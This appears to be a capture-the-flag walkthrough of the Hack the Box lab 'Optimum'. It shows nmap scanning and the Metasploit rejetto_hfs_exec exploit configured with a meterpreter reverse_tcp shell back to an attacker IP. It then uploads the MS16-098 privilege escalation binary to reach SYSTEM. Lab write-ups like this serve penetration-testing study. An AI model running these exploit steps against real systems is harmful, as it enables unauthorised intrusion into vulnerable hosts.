Hello friends!! Today we are going to solve another CTF challenge called “Optimum” which is categorised as retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper knowledge of Penetration testing. Let start and learn how to breach it.
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online, therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.
nmap -A 10.10.10.8
From given below image, you can observe that we found ports 80 is open for file sharing using HFS 2.3 in victim’s network.
When I Googled relative exploit I found first link for Metasploit exploit.
Then run msfconsole command in terminal and load metasploit framework to use the said exploit and for that type the following commands :
msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) >exploit
And when it works perfectly, you will get a meterpreter session 1 as shown below and by running sysinfo command you will know about the victim’s system information.
Now let’s complete this task by searching user.txt and root.txt flag which is hidden somewhere inside its directories.
Inside c:\Document and Setting \kostas\Desktop I found the user.txt file and used the cat command to read this file.
Great!! We got our 1st flag successfully
To get root flag I really struggle a lot, all privilege escalation exploit suggested by recon/local_exploit_suggester did not work when I tried them. Then I took help from Google and searched for exploit related to windows server and found many exploits, “MS16-098 exploit 41020” was among them. I simply downloaded this exe file and applied manual privilege escalation.
After downloading exe file from Google, I transferred it to target’s machine via meterperter session; with help of following commands:
Meterpreter> upload /root/Desktop/41020.exe .
Then after executing whoami command, it assured me “nt authority\system”
Inside c:\Document and Setting \Administrator\Desktop I found the root.txt file and used the type command to read the file.
Great!! We got our 2nd flag successfully
And this way, we successfully solved our challenge. YAY!
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here